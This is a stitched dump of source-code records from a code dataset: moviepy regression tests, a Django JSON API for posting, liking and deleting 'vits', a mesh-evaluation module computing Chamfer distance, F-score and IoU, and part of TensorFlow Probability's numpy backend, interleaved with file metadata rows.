def test_PR_515():
# Won't actually work until video is in download_media
clip = VideoFileClip("media/fire2.mp4", fps_source='tbr')
assert clip.fps == 90000
clip = VideoFileClip("media/fire2.mp4", fps_source='fps')
assert clip.fps == 10.51
def test_PR_529():
video_clip = VideoFileClip("media/fire2.mp4")
assert video_clip.rotation ==180
if __name__ == '__main__':
pytest.main()
| 27.77551
| 79
| 0.630051
|
import sys
import os
import pytest
from moviepy.editor import *
from moviepy.video.tools.interpolators import Trajectory
import sys
sys.path.append("tests")
import download_media
from test_helper import PYTHON_VERSION, TMP_DIR, TRAVIS
def test_download_media(capsys):
with capsys.disabled():
download_media.download()
def test_PR_306():
if TRAVIS:
return
assert TextClip.list('font') != []
assert TextClip.list('color') != []
with pytest.raises(Exception, message="Expecting Exception"):
TextClip.list('blah')
def test_PR_339():
if TRAVIS:
return
overlay = TextClip(txt='foo',
color='white', font="Liberation-Mono",
size=(640, 480),
method='caption',
align='center',
fontsize=25)
overlay = TextClip(txt='foo', font="Liberation-Mono", method='label')
def test_PR_373():
result = Trajectory.load_list("media/traj.txt")
Trajectory.save_list(result, os.path.join(TMP_DIR, "traj1.txt"))
result1 = Trajectory.load_list(os.path.join(TMP_DIR,"traj1.txt"))
assert len(result[0].tt) == len(result1[0].tt)
for i in range(len(result[0].tt)):
assert result[0].tt[i] == result1[0].tt[i]
assert len(result[0].xx) == len(result1[0].xx)
for i in range(len(result[0].xx)):
assert result[0].xx[i] == result1[0].xx[i]
assert len(result[0].yy) == len(result1[0].yy)
for i in range(len(result[0].yy)):
assert result[0].yy[i] == result1[0].yy[i]
def test_PR_424():
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10)
clip = ColorClip([1000, 600], col=(60, 60, 60), duration=10)
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10, col=(2,2,2))
def test_PR_458():
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10)
clip.write_videofile(os.path.join(TMP_DIR, "test.mp4"),
progress_bar=False, fps=30)
def test_PR_515():
clip = VideoFileClip("media/fire2.mp4", fps_source='tbr')
assert clip.fps == 90000
clip = VideoFileClip("media/fire2.mp4", fps_source='fps')
assert clip.fps == 10.51
def test_PR_529():
video_clip = VideoFileClip("media/fire2.mp4")
assert video_clip.rotation ==180
if __name__ == '__main__':
pytest.main()
| true
| true
|
790c65e13683bf49316ebe0a262eadf6d21d4058
| 5,280
|
py
|
Python
|
apps/vit/api.py
|
Visualway/Vitary
|
c7db9a25837fa7390b2177b9db48e73c6f1ab3c8
|
[
"BSD-3-Clause"
] | 4
|
2021-12-24T16:07:44.000Z
|
2022-03-04T02:30:20.000Z
|
apps/vit/api.py
|
Visualway/Vitary
|
c7db9a25837fa7390b2177b9db48e73c6f1ab3c8
|
[
"BSD-3-Clause"
] | 4
|
2021-12-30T13:32:56.000Z
|
2022-03-15T03:58:48.000Z
|
apps/vit/api.py
|
Visualway/Vitary
|
c7db9a25837fa7390b2177b9db48e73c6f1ab3c8
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import re
from django.http import JsonResponse
from django.db.models import Q
from django.urls import reverse
from django.views.decorators.csrf import csrf_exempt
from apps.vit.models import Vit
from apps.notification.utilities import notify
from apps.vit.utilities import find_mention, find_plustag
from .forms import VitForm
from apps.develop.backends import KeyBackend
def like(request):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.GET.get('vit_pk'))
if vit.likes.filter(id=request.user.id).exists():
vit.likes.remove(request.user)
vit.like_count -= 1
vit.save()
return JsonResponse({'status': 'success', 'likes': vit.likes.count(), 'liked': False}, status=200)
else:
vit.likes.add(request.user)
vit.like_count += 1
vit.save()
if vit.user != request.user:
notify(message=f"{request.user.username.title()} liked your Vit - '{vit.body}'", notification_type="like", to_user=vit.user,
by_user=request.user, link=reverse('vit_detail', kwargs={'pk': vit.id}))
return JsonResponse({'status': 'success', 'likes': vit.likes.count(), 'liked': True}, status=200)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
def get_vits(request):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
vits = Vit.objects.filter(Q(user=request.user) | Q(
user__profile__in=request.user.profile.follows.all()) | Q(user__profile__in=request.user.profile.followed_by.all())).order_by('-date')
return JsonResponse({'vits': [vit.to_json() for vit in vits]})
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
def get_vit(request, id):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=id)
return JsonResponse({'vit': vit.to_json()}, status=200)
except:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
@csrf_exempt
def add_vit(request):
"""
Add a new vit with API, currently image and video are not supported
"""
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
form = VitForm(request.POST)
if form.is_valid():
vit = form.save(commit=False)
vit.user = request.user
vit.save()
return JsonResponse({'status': 'success', 'vit': vit.to_json()}, status=201)
else:
return JsonResponse({'error': 'No vit body provided'}, status=400)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
@csrf_exempt
def edit_vit(request):
"""
Edit a vit with API
"""
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.POST.get('vit_pk'))
if vit.user == request.user:
form = VitForm(request.POST, instance=vit)
if form.is_valid():
vit = form.save(commit=False)
vit.save()
return JsonResponse({'status': 'success', 'vit': vit.to_json()}, status=201)
else:
return JsonResponse({'error': 'No vit body provided'}, status=400)
else:
return JsonResponse({'error': 'You do not have permission to edit this vit'}, status=403)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
@csrf_exempt
def delete_vit(request):
"""
Delete a vit with API
"""
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.POST.get('vit_pk'))
if vit.user == request.user:
vit.delete()
return JsonResponse({'status': 'success'}, status=200)
else:
return JsonResponse({'error': 'You do not have permission to delete this vit'}, status=403)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
| 39.111111
| 146
| 0.586174
|
import json
import re
from django.http import JsonResponse
from django.db.models import Q
from django.urls import reverse
from django.views.decorators.csrf import csrf_exempt
from apps.vit.models import Vit
from apps.notification.utilities import notify
from apps.vit.utilities import find_mention, find_plustag
from .forms import VitForm
from apps.develop.backends import KeyBackend
def like(request):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.GET.get('vit_pk'))
if vit.likes.filter(id=request.user.id).exists():
vit.likes.remove(request.user)
vit.like_count -= 1
vit.save()
return JsonResponse({'status': 'success', 'likes': vit.likes.count(), 'liked': False}, status=200)
else:
vit.likes.add(request.user)
vit.like_count += 1
vit.save()
if vit.user != request.user:
notify(message=f"{request.user.username.title()} liked your Vit - '{vit.body}'", notification_type="like", to_user=vit.user,
by_user=request.user, link=reverse('vit_detail', kwargs={'pk': vit.id}))
return JsonResponse({'status': 'success', 'likes': vit.likes.count(), 'liked': True}, status=200)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
def get_vits(request):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
vits = Vit.objects.filter(Q(user=request.user) | Q(
user__profile__in=request.user.profile.follows.all()) | Q(user__profile__in=request.user.profile.followed_by.all())).order_by('-date')
return JsonResponse({'vits': [vit.to_json() for vit in vits]})
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
def get_vit(request, id):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=id)
return JsonResponse({'vit': vit.to_json()}, status=200)
except:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
@csrf_exempt
def add_vit(request):
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
form = VitForm(request.POST)
if form.is_valid():
vit = form.save(commit=False)
vit.user = request.user
vit.save()
return JsonResponse({'status': 'success', 'vit': vit.to_json()}, status=201)
else:
return JsonResponse({'error': 'No vit body provided'}, status=400)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
@csrf_exempt
def edit_vit(request):
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.POST.get('vit_pk'))
if vit.user == request.user:
form = VitForm(request.POST, instance=vit)
if form.is_valid():
vit = form.save(commit=False)
vit.save()
return JsonResponse({'status': 'success', 'vit': vit.to_json()}, status=201)
else:
return JsonResponse({'error': 'No vit body provided'}, status=400)
else:
return JsonResponse({'error': 'You do not have permission to edit this vit'}, status=403)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
@csrf_exempt
def delete_vit(request):
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.POST.get('vit_pk'))
if vit.user == request.user:
vit.delete()
return JsonResponse({'status': 'success'}, status=200)
else:
return JsonResponse({'error': 'You do not have permission to delete this vit'}, status=403)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
| true
| true
|
790c663c396e5ece82b4204d3424a93b2fd0eb35
| 7,912
|
py
|
Python
|
src/eval.py
|
hummat/convolutional_occupancy_networks
|
bb351edff59c196e01aa687943e19fee4ac11077
|
[
"MIT"
] | null | null | null |
src/eval.py
|
hummat/convolutional_occupancy_networks
|
bb351edff59c196e01aa687943e19fee4ac11077
|
[
"MIT"
] | null | null | null |
src/eval.py
|
hummat/convolutional_occupancy_networks
|
bb351edff59c196e01aa687943e19fee4ac11077
|
[
"MIT"
] | null | null | null |
import logging
import numpy as np
import trimesh
from src.common import compute_iou
# from scipy.spatial import cKDTree
from src.utils.libkdtree import KDTree
from src.utils.libmesh import check_mesh_contains
# Maximum values for bounding box [-0.5, 0.5]^3
EMPTY_PCL_DICT = {
'completeness': np.sqrt(3),
'accuracy': np.sqrt(3),
'completeness2': 3,
'accuracy2': 3,
'chamfer': 6,
}
EMPTY_PCL_DICT_NORMALS = {
'normals completeness': -1.,
'normals accuracy': -1.,
'normals': -1.,
}
logger = logging.getLogger(__name__)
class MeshEvaluator(object):
""" Mesh evaluation class.
It handles the mesh evaluation process.
Args:
n_points (int): number of points to be used for evaluation
"""
def __init__(self, n_points=100000):
self.n_points = n_points
def eval_mesh(self,
mesh,
pointcloud_tgt,
normals_tgt,
points_iou,
occ_tgt,
remove_wall=False):
""" Evaluates a mesh.
Args:
mesh (trimesh): mesh which should be evaluated
pointcloud_tgt (numpy array): target point cloud
normals_tgt (numpy array): target normals
points_iou (numpy_array): points tensor for IoU evaluation
occ_tgt (numpy_array): GT occupancy values for IoU points
"""
if len(mesh.vertices) != 0 and len(mesh.faces) != 0:
if remove_wall: # ! Remove walls and floors
pointcloud, idx = mesh.sample(2 * self.n_points, return_index=True)
eps = 0.007
x_max, x_min = pointcloud_tgt[:, 0].max(), pointcloud_tgt[:, 0].min()
y_max, y_min = pointcloud_tgt[:, 1].max(), pointcloud_tgt[:, 1].min()
z_max, z_min = pointcloud_tgt[:, 2].max(), pointcloud_tgt[:, 2].min()
# add small offsets
x_max, x_min = x_max + eps, x_min - eps
y_max, y_min = y_max + eps, y_min - eps
z_max, z_min = z_max + eps, z_min - eps
mask_x = (pointcloud[:, 0] <= x_max) & (pointcloud[:, 0] >= x_min)
mask_y = (pointcloud[:, 1] >= y_min) # floor
mask_z = (pointcloud[:, 2] <= z_max) & (pointcloud[:, 2] >= z_min)
mask = mask_x & mask_y & mask_z
pointcloud_new = pointcloud[mask]
# Subsample
idx_new = np.random.randint(pointcloud_new.shape[0], size=self.n_points)
pointcloud = pointcloud_new[idx_new]
idx = idx[mask][idx_new]
else:
pointcloud, idx = mesh.sample(self.n_points, return_index=True)
pointcloud = pointcloud.astype(np.float32)
normals = mesh.face_normals[idx]
else:
pointcloud = np.empty((0, 3))
normals = np.empty((0, 3))
out_dict = self.eval_pointcloud(pointcloud, pointcloud_tgt, normals, normals_tgt)
if len(mesh.vertices) != 0 and len(mesh.faces) != 0:
occ = check_mesh_contains(mesh, points_iou)
if occ_tgt.min() < 0:
occ_tgt = (occ_tgt <= 0).astype(np.float32)
out_dict['iou'] = compute_iou(occ, occ_tgt)
else:
out_dict['iou'] = 0.
return out_dict
@staticmethod
def eval_pointcloud(pointcloud,
pointcloud_tgt,
normals=None,
normals_tgt=None,
thresholds=np.linspace(1. / 1000, 1, 1000)):
""" Evaluates a point cloud.
Args:
pointcloud (numpy array): predicted point cloud
pointcloud_tgt (numpy array): target point cloud
normals (numpy array): predicted normals
normals_tgt (numpy array): target normals
thresholds (numpy array): threshold values for the F-score calculation
"""
# Return maximum losses if pointcloud is empty
if pointcloud.shape[0] == 0:
logger.warning('Empty pointcloud / mesh detected!')
out_dict = EMPTY_PCL_DICT.copy()
if normals is not None and normals_tgt is not None:
out_dict.update(EMPTY_PCL_DICT_NORMALS)
return out_dict
pointcloud = np.asarray(pointcloud)
pointcloud_tgt = np.asarray(pointcloud_tgt)
# Completeness: how far are the points of the target point cloud from the predicted point cloud
completeness, completeness_normals = distance_p2p(pointcloud_tgt, normals_tgt, pointcloud, normals)
recall = get_threshold_percentage(completeness, thresholds)
completeness2 = completeness ** 2
completeness = completeness.mean()
completeness2 = completeness2.mean()
completeness_normals = completeness_normals.mean()
# Accuracy: how far are the points of the predicted pointcloud from the target pointcloud
accuracy, accuracy_normals = distance_p2p(pointcloud, normals, pointcloud_tgt, normals_tgt)
precision = get_threshold_percentage(accuracy, thresholds)
accuracy2 = accuracy ** 2
accuracy = accuracy.mean()
accuracy2 = accuracy2.mean()
accuracy_normals = accuracy_normals.mean()
# Chamfer distance
chamferL2 = 0.5 * (completeness2 + accuracy2)
normals_correctness = (0.5 * completeness_normals + 0.5 * accuracy_normals)
chamferL1 = 0.5 * (completeness + accuracy)
# F-Score
F = [2 * precision[i] * recall[i] / (precision[i] + recall[i]) for i in range(len(precision))]
out_dict = {
'completeness': completeness,
'accuracy': accuracy,
'normals completeness': completeness_normals,
'normals accuracy': accuracy_normals,
'normals': normals_correctness,
'completeness2': completeness2,
'accuracy2': accuracy2,
'chamfer-L2': chamferL2,
'chamfer-L1': chamferL1,
'f-score': F[9], # threshold = 1.0%
'f-score-15': F[14], # threshold = 1.5%
'f-score-20': F[19], # threshold = 2.0%
}
return out_dict
def distance_p2p(points_src, normals_src, points_tgt, normals_tgt):
""" Computes minimal distances of each point in points_src to points_tgt.
Args:
points_src (numpy array): source points
normals_src (numpy array): source normals
points_tgt (numpy array): target points
normals_tgt (numpy array): target normals
"""
kdtree = KDTree(points_tgt)
dist, idx = kdtree.query(points_src)
if normals_src is not None and normals_tgt is not None:
normals_src = normals_src / np.linalg.norm(normals_src, axis=-1, keepdims=True)
normals_tgt = normals_tgt / np.linalg.norm(normals_tgt, axis=-1, keepdims=True)
normals_dot_product = (normals_tgt[idx] * normals_src).sum(axis=-1)
# Handle normals that point into wrong direction gracefully (mostly due to method not caring about this in generation)
normals_dot_product = np.abs(normals_dot_product)
else:
normals_dot_product = np.array([np.nan] * points_src.shape[0], dtype=np.float32)
return dist, normals_dot_product
def distance_p2m(points, mesh):
""" Compute minimal distances of each point in points to mesh.
Args:
points (numpy array): points array
mesh (trimesh): mesh
"""
_, dist, _ = trimesh.proximity.closest_point(mesh, points)
return dist
def get_threshold_percentage(dist, thresholds):
""" Evaluates a point cloud.
Args:
dist (numpy array): calculated distance
thresholds (numpy array): threshold values for the F-score calculation
"""
in_threshold = [(dist <= t).mean() for t in thresholds]
return in_threshold
| 36.293578
| 126
| 0.605536
|
import logging
import numpy as np
import trimesh
from src.common import compute_iou
from src.utils.libkdtree import KDTree
from src.utils.libmesh import check_mesh_contains
EMPTY_PCL_DICT = {
'completeness': np.sqrt(3),
'accuracy': np.sqrt(3),
'completeness2': 3,
'accuracy2': 3,
'chamfer': 6,
}
EMPTY_PCL_DICT_NORMALS = {
'normals completeness': -1.,
'normals accuracy': -1.,
'normals': -1.,
}
logger = logging.getLogger(__name__)
class MeshEvaluator(object):
    """Evaluates a predicted mesh against ground-truth surface points,
    normals and occupancy samples.

    Reports Chamfer-L1/L2, normal consistency, per-threshold F-scores and
    volumetric IoU.

    Args:
        n_points (int): number of points sampled from the predicted mesh
            surface for the point-cloud based metrics
    """

    def __init__(self, n_points=100000):
        self.n_points = n_points

    def eval_mesh(self,
                  mesh,
                  pointcloud_tgt,
                  normals_tgt,
                  points_iou,
                  occ_tgt,
                  remove_wall=False):
        """Evaluate a mesh.

        Args:
            mesh (trimesh): predicted mesh
            pointcloud_tgt (numpy array): ground-truth surface points
            normals_tgt (numpy array): ground-truth surface normals
            points_iou (numpy array): query points for the IoU computation
            occ_tgt (numpy array): ground-truth occupancy at ``points_iou``
            remove_wall (bool): drop sampled points outside the (padded)
                target bounding box — y is only bounded from below,
                presumably to cut away a floor/wall plane (TODO confirm)
        """
        if len(mesh.vertices) != 0 and len(mesh.faces) != 0:
            if remove_wall:
                # Oversample by 2x, filter to the padded target bounding
                # box, then resample (with replacement) down to n_points.
                pointcloud, idx = mesh.sample(2 * self.n_points, return_index=True)
                eps = 0.007
                x_max, x_min = pointcloud_tgt[:, 0].max(), pointcloud_tgt[:, 0].min()
                y_max, y_min = pointcloud_tgt[:, 1].max(), pointcloud_tgt[:, 1].min()
                z_max, z_min = pointcloud_tgt[:, 2].max(), pointcloud_tgt[:, 2].min()
                x_max, x_min = x_max + eps, x_min - eps
                y_max, y_min = y_max + eps, y_min - eps
                z_max, z_min = z_max + eps, z_min - eps
                mask_x = (pointcloud[:, 0] <= x_max) & (pointcloud[:, 0] >= x_min)
                mask_y = (pointcloud[:, 1] >= y_min)  # y deliberately not capped above
                mask_z = (pointcloud[:, 2] <= z_max) & (pointcloud[:, 2] >= z_min)
                mask = mask_x & mask_y & mask_z
                pointcloud_new = pointcloud[mask]
                # Subsample (with replacement) to exactly n_points.
                idx_new = np.random.randint(pointcloud_new.shape[0], size=self.n_points)
                pointcloud = pointcloud_new[idx_new]
                idx = idx[mask][idx_new]
            else:
                pointcloud, idx = mesh.sample(self.n_points, return_index=True)
            pointcloud = pointcloud.astype(np.float32)
            # Per-sample normal = normal of the face each point was drawn from.
            normals = mesh.face_normals[idx]
        else:
            # Degenerate mesh: empty arrays make eval_pointcloud return the
            # worst-case EMPTY_PCL_DICT constants.
            pointcloud = np.empty((0, 3))
            normals = np.empty((0, 3))
        out_dict = self.eval_pointcloud(pointcloud, pointcloud_tgt, normals, normals_tgt)
        if len(mesh.vertices) != 0 and len(mesh.faces) != 0:
            occ = check_mesh_contains(mesh, points_iou)
            if occ_tgt.min() < 0:
                # NOTE(review): negative occ_tgt values appear to encode a
                # signed field with "inside" <= 0 — binarize; confirm with
                # the data pipeline.
                occ_tgt = (occ_tgt <= 0).astype(np.float32)
            out_dict['iou'] = compute_iou(occ, occ_tgt)
        else:
            out_dict['iou'] = 0.
        return out_dict

    @staticmethod
    def eval_pointcloud(pointcloud,
                        pointcloud_tgt,
                        normals=None,
                        normals_tgt=None,
                        thresholds=np.linspace(1. / 1000, 1, 1000)):
        """Evaluate a predicted point cloud against the target cloud.

        Args:
            pointcloud (numpy array): predicted point cloud
            pointcloud_tgt (numpy array): target point cloud
            normals (numpy array): predicted normals
            normals_tgt (numpy array): target normals
            thresholds (numpy array): thresholds for the F-score curves
        """
        if pointcloud.shape[0] == 0:
            logger.warning('Empty pointcloud / mesh detected!')
            out_dict = EMPTY_PCL_DICT.copy()
            if normals is not None and normals_tgt is not None:
                out_dict.update(EMPTY_PCL_DICT_NORMALS)
            return out_dict
        pointcloud = np.asarray(pointcloud)
        pointcloud_tgt = np.asarray(pointcloud_tgt)
        # Completeness: distance of each GT point to the prediction (recall side).
        completeness, completeness_normals = distance_p2p(pointcloud_tgt, normals_tgt, pointcloud, normals)
        recall = get_threshold_percentage(completeness, thresholds)
        completeness2 = completeness ** 2
        completeness = completeness.mean()
        completeness2 = completeness2.mean()
        completeness_normals = completeness_normals.mean()
        # Accuracy: distance of each predicted point to the GT (precision side).
        accuracy, accuracy_normals = distance_p2p(pointcloud, normals, pointcloud_tgt, normals_tgt)
        precision = get_threshold_percentage(accuracy, thresholds)
        accuracy2 = accuracy ** 2
        accuracy = accuracy.mean()
        accuracy2 = accuracy2.mean()
        accuracy_normals = accuracy_normals.mean()
        # Chamfer distances are symmetric means of the two directions.
        chamferL2 = 0.5 * (completeness2 + accuracy2)
        normals_correctness = (0.5 * completeness_normals + 0.5 * accuracy_normals)
        chamferL1 = 0.5 * (completeness + accuracy)
        # F-score per threshold (harmonic mean of precision and recall).
        F = [2 * precision[i] * recall[i] / (precision[i] + recall[i]) for i in range(len(precision))]
        out_dict = {
            'completeness': completeness,
            'accuracy': accuracy,
            'normals completeness': completeness_normals,
            'normals accuracy': accuracy_normals,
            'normals': normals_correctness,
            'completeness2': completeness2,
            'accuracy2': accuracy2,
            'chamfer-L2': chamferL2,
            'chamfer-L1': chamferL1,
            'f-score': F[9],      # threshold = 0.01 (thresholds[9])
            'f-score-15': F[14],  # threshold = 0.015
            'f-score-20': F[19],  # threshold = 0.02
        }
        return out_dict
def distance_p2p(points_src, normals_src, points_tgt, normals_tgt):
kdtree = KDTree(points_tgt)
dist, idx = kdtree.query(points_src)
if normals_src is not None and normals_tgt is not None:
normals_src = normals_src / np.linalg.norm(normals_src, axis=-1, keepdims=True)
normals_tgt = normals_tgt / np.linalg.norm(normals_tgt, axis=-1, keepdims=True)
normals_dot_product = (normals_tgt[idx] * normals_src).sum(axis=-1)
normals_dot_product = np.abs(normals_dot_product)
else:
normals_dot_product = np.array([np.nan] * points_src.shape[0], dtype=np.float32)
return dist, normals_dot_product
def distance_p2m(points, mesh):
_, dist, _ = trimesh.proximity.closest_point(mesh, points)
return dist
def get_threshold_percentage(dist, thresholds):
in_threshold = [(dist <= t).mean() for t in thresholds]
return in_threshold
| true
| true
|
790c66547531536f4bc1eeec53b6e037c55a0e43
| 14,452
|
py
|
Python
|
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
simeoncarstens/probability
|
054a720ff9f221dd9660acd7ce7fb38a1dbb1290
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
simeoncarstens/probability
|
054a720ff9f221dd9660acd7ce7fb38a1dbb1290
|
[
"Apache-2.0"
] | 2
|
2021-08-25T16:14:51.000Z
|
2022-02-10T04:47:11.000Z
|
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
michalbrys/probability
|
054a720ff9f221dd9660acd7ce7fb38a1dbb1290
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Numpy implementations of TensorFlow general top-level functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
# Dependency imports
import numpy as np
from tensorflow_probability.python.internal.backend.numpy import _utils as utils
from tensorflow_probability.python.internal.backend.numpy import ops
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import einsum
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import norm
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import tensordot
__all__ = [
'concat',
'einsum',
'expand_dims',
'fill',
'gather',
'gather_nd',
'linspace',
'meshgrid',
'norm',
'one_hot',
'ones',
'ones_like',
'pad',
'range',
'rank',
'reshape',
'reverse',
'repeat',
'roll',
'searchsorted',
'shape',
'size',
'slice',
'split',
'squeeze',
'stack',
'tensordot',
'tile',
'transpose',
'unstack',
'where',
'zeros',
'zeros_like',
# 'boolean_mask',
# 'foldl',
# 'foldr',
]
JAX_MODE = False
if JAX_MODE:
import jax # pylint: disable=g-import-not-at-top
def _astuple(x):
try:
return tuple(x)
except TypeError:
return x
def _gather(  # pylint: disable=unused-argument
    params,
    indices,
    validate_indices=None,
    axis=None,
    batch_dims=0,
    name=None):
  """Numpy/JAX counterpart of `tf.gather`: take `indices` from `params`
  along `axis`, treating the first `batch_dims` dimensions as batch axes."""
  indices = ops.convert_to_tensor(indices, dtype_hint=np.int32)
  if validate_indices is not None:
    raise NotImplementedError(
        'Argument `validate_indices != None` is currently unimplemented.')
  if batch_dims < 0:
    raise NotImplementedError('Negative `batch_dims` is currently unsupported.')
  if axis is None:
    axis = batch_dims
  if axis < 0:
    axis = axis + len(params.shape)
  # NOTE: For only the numpy backend, this function could create a single result
  # ndarray and use in-place updates. For the Jax backend, this function
  # vmaps `np.take`.
  if JAX_MODE:
    take = lambda params, indices: np.take(params, indices,  # pylint: disable=g-long-lambda
                                           axis=axis - batch_dims)
    # Wrap `take` in one jax.vmap per batch dimension.
    take = functools.reduce(
        lambda g, f: f(g), [jax.vmap] * int(batch_dims),
        take
    )
    return take(params, indices)
  params = ops.convert_to_tensor(params)
  # Numpy fallback: loop over the batch index space, gather each slice with
  # np.take, then restore the expected output shape.
  res = np.array([
      np.take(params[i], indices[i], axis=axis - batch_dims)
      for i in np.ndindex(*params.shape[:batch_dims])
  ])
  return np.reshape(
      res,
      params.shape[:axis] + indices.shape[batch_dims:] + params.shape[axis+1:])
def _args_to_matching_arrays(args_list, dtype_hint=None):
  """Converts a list to array using the first element for dtype.

  This method is used to match the behavior of `tf.concat`.

  Args:
    args_list: A list or tuple of arguments.
    dtype_hint: An optional hint used when converting the args to tensors.
  Returns:
    A list of tensors.
  """
  # Prefer the dtype of the first element that is already a tensor, if any.
  dtype = None
  for arg in args_list:
    if ops.is_tensor(arg):
      dtype = arg.dtype
      break
  if dtype is None:
    # No tensor present: convert left-to-right, locking in the dtype of the
    # first converted element for the remaining ones.
    ret = []
    for arg in args_list:
      ret.append(ops.convert_to_tensor(arg, dtype, dtype_hint=dtype_hint))
      if dtype is None:
        dtype = ret[-1].dtype
  else:
    ret = [ops.convert_to_tensor(arg, dtype) for arg in args_list]
  return ret
def _concat(values, axis, name='concat'):
  """Numpy counterpart of `tf.concat`: join `values` along `axis` after
  matching their dtypes."""
  del name
  if axis is None:
    raise ValueError('None values for `axis` argument not supported.')
  if not isinstance(values, (list, tuple)):
    values = [values]
  if len(values) == 1:
    # Single input: nothing to concatenate.
    return values[0]
  matched = _args_to_matching_arrays(values)
  return np.concatenate(matched, axis=axis)
def _gather_nd_single(params, indices):
idx = tuple(np.moveaxis(indices, -1, 0))
return params[idx]
def _gather_nd(  # pylint: disable=unused-argument
    params,
    indices,
    batch_dims=0,
    name=None):
  """Numpy/JAX counterpart of `tf.gather_nd`: gather slices of `params`
  addressed by the trailing dimension of `indices`."""
  indices = ops.convert_to_tensor(indices, dtype_hint=np.int32)
  if batch_dims < 0:
    raise NotImplementedError('Negative `batch_dims` is currently unsupported.')
  if not JAX_MODE and batch_dims > 0:
    raise NotImplementedError(
        '`batch_dims > 0` currently unsupported in NumPy backend.')
  gather_nd_ = _gather_nd_single
  if JAX_MODE:
    # Wrap the single-example kernel in one jax.vmap per batch dimension.
    gather_nd_ = functools.reduce(
        lambda g, f: f(g), [jax.vmap] * int(batch_dims),
        gather_nd_
    )
  return gather_nd_(params, indices)
def _linspace(start, stop, num, name=None, axis=0):  # pylint: disable=unused-argument
  """Match TF behavior with np.linspace."""
  start = ops.convert_to_tensor(start)
  # Match TF weirdness arising from truediv(int32, int32) = float64
  if np.issubdtype(start.dtype, np.integer):
    start = start.astype(np.float64)
  stop = ops.convert_to_tensor(stop, dtype=start.dtype)
  num = ops.convert_to_tensor(num, dtype_hint=np.int32)
  if not np.issubdtype(num.dtype, np.integer):
    raise TypeError('`num` must be an integer but got {}'.format(num.dtype))
  num = num.astype(np.int32)
  # Cast back to start.dtype; np.linspace may otherwise promote the result.
  return np.linspace(start, stop, num, axis=axis).astype(start.dtype)
def _one_hot(  # pylint: disable=unused-argument
    indices,
    depth,
    on_value=None,
    off_value=None,
    axis=None,
    dtype=None,
    name=None):
  """Numpy counterpart of `tf.one_hot` (defaults: on=1, off=0)."""
  if on_value is None:
    on_value = 1
  if off_value is None:
    off_value = 0
  if dtype is None:
    dtype = utils.common_dtype([on_value, off_value], np.float32)
  indices = np.array(indices)
  depth = np.array(depth)
  # True wherever the class index differs from `indices`, i.e. everywhere
  # except the "hot" position along the appended last axis.
  pred = abs(np.arange(depth, dtype=indices.dtype) -
             indices[..., np.newaxis]) > 0
  y_out = np.where(pred, np.array(off_value, dtype), np.array(on_value, dtype))
  if axis is not None:
    # The one-hot axis was appended last; move it where the caller asked.
    y_out = np.moveaxis(y_out, -1, axis)
  return y_out
